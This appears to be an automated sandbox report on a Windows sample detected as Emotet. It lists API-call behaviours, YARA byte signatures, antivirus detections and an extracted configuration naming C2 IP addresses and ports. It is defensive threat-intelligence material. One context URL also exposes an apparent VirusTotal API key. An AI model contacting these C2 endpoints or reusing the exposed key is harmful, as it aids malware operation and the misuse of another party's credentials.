Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,2_2_0045894E
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,2_2_00458B20
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: _strlen,EnumSystemLocalesA,2_2_00458BE4
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,2_2_00456C53
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,2_2_00458C74
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,2_2_00458C0D
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,2_2_00458CB0
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement,2_2_00456EDE
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,GetLocaleInfoA,2_2_0045AF55
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: GetLocaleInfoW,2_2_0045AF08
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW,2_2_0044AF15
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: _LocaleUpdate::_LocaleUpdate,GetLocaleInfoW,2_2_0045AF21
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: GetLocaleInfoA,2_2_00458FB0
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,2_2_0045B094
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,2_2_004571A4
Contains functionality to query CPU information (cpuid)Show sources
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 0_2_0074E567 cpuid 0_2_0074E567
Queries the volume information (name, serial number etc) of a deviceShow sources
Source: C:\Users\user\Desktop\3ki05193698.exe.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\driverthunk.exeQueries volume information: C:\ VolumeInformationJump to behavior
Contains functionality to query local / system timeShow sources
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 0_2_0043A350 GetSystemTimeAsFileTime,__aulldiv,0_2_0043A350
Contains functionality to query time zone informationShow sources
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 0_2_0044FF31 __lock,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,____lc_codepage_func,__getenv_helper_nolock,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,0_2_0044FF31
Contains functionality to query windows versionShow sources
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 0_2_00406428 _memset,GetVersionExA,0_2_00406428
Queries the cryptographic machine GUIDShow sources
Source: C:\Windows\SysWOW64\driverthunk.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information:

barindex
Yara detected EmotetShow sources
Source: Yara matchFile source: 00000002.00000002.2031798136.00000000005F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000002.1999620941.0000000000740000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000002.2792994904.0000000000640000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000002.2029903542.0000000000601000.00000020.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000002.2029828683.00000000004A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000002.2793212106.0000000000F51000.00000020.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000002.00000002.2031865725.00000000006A1000.00000020.00000001.sdmp, type: MEMORY

Remote Access Functionality:

barindex
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)Show sources
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 0_2_0041007A __EH_prolog3_GS,lstrlenW,__snwprintf_s,CoTaskMemFree,CreateBindCtx,CoTaskMemFree,CoTaskMemFree,0_2_0041007A
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 0_2_0040EB5A CreateBindCtx,_wcslen,CoTaskMemFree,0_2_0040EB5A
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 2_2_0041007A __EH_prolog3_GS,lstrlenW,__snwprintf_s,CoTaskMemFree,CreateBindCtx,CoTaskMemFree,CoTaskMemFree,2_2_0041007A
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 2_2_0040EB5A CreateBindCtx,_wcslen,CoTaskMemFree,2_2_0040EB5A

Malware Configuration

Threatname: Emotet

{"C2 list": ["45.55.179.121/GfGV9Yv", "45.55.179.121:8080", "5.55.179.121:8080"]}

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Simulations

Behavior and APIs

No simulations

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
3ki05193698.exe.exe77%VirustotalBrowse
3ki05193698.exe.exe100%AviraTR/AD.Emotet.lnvbd
3ki05193698.exe.exe100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

SourceDetectionScannerLabelLinkDownload
4.0.driverthunk.exe.400000.0.unpack100%AviraTR/AD.Emotet.lnvbdDownload File
0.0.3ki05193698.exe.exe.400000.0.unpack100%AviraTR/AD.Emotet.lnvbdDownload File
2.0.3ki05193698.exe.exe.400000.0.unpack100%AviraTR/AD.Emotet.lnvbdDownload File
3.0.driverthunk.exe.400000.0.unpack100%AviraTR/AD.Emotet.lnvbdDownload File

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://45.55.179.121:8080/GfGV9Yv0%Avira URL Cloudsafe
http://45.55.179.121:8080/GfGV9Yvv0%Avira URL Cloudsafe
http://45.55.179.121/GfGV9Yv0%Avira URL Cloudsafe
http://45.55.179.121:8080/GfGV9Yve0%Avira URL Cloudsafe

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.1999763726.0000000002281000.00000020.00000001.sdmpEmotetEmotet Payloadkevoreilly
  • 0xfad:$snippet2: 6A 13 68 01 00 01 00 FF 15 58 15 29 02 85 C0
  • 0x5066:$snippet6: 33 C0 21 05 BC 3E 29 02 A3 B8 3E 29 02 39 05 70 03 29 02 74 18 40 A3 B8 3E 29 02 83 3C C5 70 03 ...
00000002.00000002.2031798136.00000000005F0000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
    00000002.00000002.2031798136.00000000005F0000.00000040.00000001.sdmpEmotetEmotet Payloadkevoreilly
    • 0x18ec:$snippet2: 6A 13 68 01 00 01 00 FF 15 58 15 41 00 85 C0
    • 0x59a5:$snippet6: 33 C0 21 05 BC 3E 41 00 A3 B8 3E 41 00 39 05 70 03 41 00 74 18 40 A3 B8 3E 41 00 83 3C C5 70 03 ...
    00000000.00000002.1999620941.0000000000740000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
      00000000.00000002.1999620941.0000000000740000.00000040.00000001.sdmpEmotetEmotet Payloadkevoreilly
      • 0x18ec:$snippet2: 6A 13 68 01 00 01 00 FF 15 58 15 41 00 85 C0
      • 0x59a5:$snippet6: 33 C0 21 05 BC 3E 41 00 A3 B8 3E 41 00 39 05 70 03 41 00 74 18 40 A3 B8 3E 41 00 83 3C C5 70 03 ...
      00000004.00000002.2792994904.0000000000640000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
        00000004.00000002.2792994904.0000000000640000.00000040.00000001.sdmpEmotetEmotet Payloadkevoreilly
        • 0x18ec:$snippet2: 6A 13 68 01 00 01 00 FF 15 58 15 41 00 85 C0
        • 0x59a5:$snippet6: 33 C0 21 05 BC 3E 41 00 A3 B8 3E 41 00 39 05 70 03 41 00 74 18 40 A3 B8 3E 41 00 83 3C C5 70 03 ...
        00000003.00000002.2029903542.0000000000601000.00000020.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
          00000003.00000002.2029903542.0000000000601000.00000020.00000001.sdmpEmotetEmotet Payloadkevoreilly
          • 0xfad:$snippet2: 6A 13 68 01 00 01 00 FF 15 58 15 61 00 85 C0
          • 0x5066:$snippet6: 33 C0 21 05 BC 3E 61 00 A3 B8 3E 61 00 39 05 70 03 61 00 74 18 40 A3 B8 3E 61 00 83 3C C5 70 03 ...
          00000003.00000002.2029828683.00000000004A0000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
            00000003.00000002.2029828683.00000000004A0000.00000040.00000001.sdmpEmotetEmotet Payloadkevoreilly
            • 0x18ec:$snippet2: 6A 13 68 01 00 01 00 FF 15 58 15 41 00 85 C0
            • 0x59a5:$snippet6: 33 C0 21 05 BC 3E 41 00 A3 B8 3E 41 00 39 05 70 03 41 00 74 18 40 A3 B8 3E 41 00 83 3C C5 70 03 ...
            00000004.00000002.2793212106.0000000000F51000.00000020.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
              00000004.00000002.2793212106.0000000000F51000.00000020.00000001.sdmpEmotetEmotet Payloadkevoreilly
              • 0xfad:$snippet2: 6A 13 68 01 00 01 00 FF 15 58 15 F6 00 85 C0
              • 0x5066:$snippet6: 33 C0 21 05 BC 3E F6 00 A3 B8 3E F6 00 39 05 70 03 F6 00 74 18 40 A3 B8 3E F6 00 83 3C C5 70 03 ...
              00000002.00000002.2031865725.00000000006A1000.00000020.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
                00000002.00000002.2031865725.00000000006A1000.00000020.00000001.sdmpEmotetEmotet Payloadkevoreilly
                • 0xfad:$snippet2: 6A 13 68 01 00 01 00 FF 15 58 15 6B 00 85 C0
                • 0x5066:$snippet6: 33 C0 21 05 BC 3E 6B 00 A3 B8 3E 6B 00 39 05 70 03 6B 00 74 18 40 A3 B8 3E 6B 00 83 3C C5 70 03 ...

                Unpacked PEs

                No yara matches

                Sigma Overview

                No Sigma rule has matched

                Joe Sandbox View / Context

                IPs

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                45.55.179.121https://library.mju.ac.th/2018/CFjDEs/Get hashmaliciousBrowse
                • 45.55.179.121:8080/mmrtTAvO2T5

                Domains

                No context

                ASN

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                unknown_NT2XFX_.jsGet hashmaliciousBrowse
                • 154.205.112.217
                _NT2XFX_.jsGet hashmaliciousBrowse
                • 154.205.112.217
                Mobile Spy.apkGet hashmaliciousBrowse
                • 216.58.201.99
                Lovetrap.apkGet hashmaliciousBrowse
                • 172.217.23.234
                live.photo.savanna.apkGet hashmaliciousBrowse
                • 216.58.201.66
                krep.itmtd.ywtjexf-1.apkGet hashmaliciousBrowse
                • 216.58.201.99
                com.chistespicanticos.apkGet hashmaliciousBrowse
                • 172.217.23.194
                sample.docx.docmGet hashmaliciousBrowse
                • 79.98.26.38
                com.saavn.android.apkGet hashmaliciousBrowse
                • 172.217.23.202
                com.droiddream.bowlingtime.apkGet hashmaliciousBrowse
                • 216.58.201.99
                AndroidDogowar.apkGet hashmaliciousBrowse
                • 216.58.201.99
                r1J9BmHm56.apkGet hashmaliciousBrowse
                • 172.217.23.200
                0ooAhFTIPf.apkGet hashmaliciousBrowse
                • 216.58.201.99
                payload.ps1Get hashmaliciousBrowse
                • 140.82.60.155
                https://u8883493.ct.sendgrid.net/ls/click?upn=sKpBeRQJbRj98yQ2Bt6p3glQU6nGQ-2BDn15x1douxdBOg-2BK36b6hVi6TvgHv63gzeDaTRj3ibCUfFvUk8ZaApuBqxRutflZATuRlEF6JwQsA-3DUikn_GIJTWyV-2Fi-2BZgXW-2BRuYM2g14tCulIkLM52ePWL3JMXcdujDpKKN0-2Brm4WTUJVmjwG5RKbrdbQhQzu7W9SMLJbMcbJ98JTOGgkI7MJugiwggs4h33x4u7bO8jwm7BCZewPjSyAU0NUtbAbXwYa4MNmgQu1omoGkFOWIHXWraDEoKrALaQ6KwZUZENog8WhI86ItPtziNoznETQd-2B9xJYkB75h9y4ykjyQTC-2BFQo6-2Fyr4UN29fpDfK2eUPRZMMjUzawaADNr0ROmXEr7e-2FgwN6q6WQVLfTKuv72D6ECClucf8kJIt-2B8EFJgxeAesF5cilkGZPHr18eDLlinZGE6903GnvumVM6xB6CUZFPtei5WnGMqUCXo1ZEn6m9vqhpnWP-2FG3kkQQo9546WOYLtPe2wV2uzP7Cfcp4N6IuE-2FGRGRnxz03hV3np5kyzr6MYwPfNIb2VqUADOslT9PRsIp9R-2BqetrC3IqLixjQYvNSi8I1UiUGOlVzTmCZDab-2FuncJyXL2PooUecTInNm0Hz4-2BD7OiD2a3l5OMgqNBb6WglNck6yPMZpfxyHb8yuatZM-2B5rPeOirEsFDusWh5EIwnbmPwRf6bBVj2QxbPi94-2BuBinma4Qb3TkLjVR8PQSSRa5a-2BisUGet hashmaliciousBrowse
                • 167.89.115.54
                https://www.virustotal.com/intelligence/download/?hash=8301e9d30d33146a74a2138cb495e9427735f5dc177ae356c28fddac8c23c93d&apikey=8ff39c8f441bc2a07896448d96eadcfd34fc64b2750cdf7b74ebfc6e63975a7cGet hashmaliciousBrowse
                • 74.125.34.46
                http://criticalltech.comGet hashmaliciousBrowse
                • 64.58.121.60
                https://docs.google.com/document/d/e/2PACX-1vSP0HJFPoeSBqJRWYHsUef8HuCaQ7etY13CnYwWhcjbljiGliK7sWMbXGMr0cZRRmB3LneMKv7Oj_a4/pubGet hashmaliciousBrowse
                • 172.217.23.193
                http://h43.felixismymaster.online/Get hashmaliciousBrowse
                • 35.244.209.32
                g0wiavwv.exeGet hashmaliciousBrowse
                • 82.118.22.178

                JA3 Fingerprints

                No context

                Dropped Files

                No context

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.